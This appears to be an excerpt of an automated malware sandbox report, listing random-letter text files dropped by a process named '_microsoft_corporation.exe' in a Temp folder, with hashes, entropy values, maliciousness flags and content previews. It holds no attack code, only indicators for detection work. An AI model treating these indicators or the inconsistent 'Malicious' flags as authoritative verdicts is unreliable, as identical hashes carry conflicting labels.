                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.702896917219035
                                                          Encrypted:false
                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                          Malicious:false
                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694982189683734
                                                          Encrypted:false
                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                          Malicious:false
                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.6994061563025005
                                                          Encrypted:false
                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                          Malicious:true
                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.696250160603532
                                                          Encrypted:false
                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                          Malicious:false
                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:true
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.700014595314478
                                                          Encrypted:false
                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                          Malicious:true
                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.6994061563025005
                                                          Encrypted:false
                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                          Malicious:false
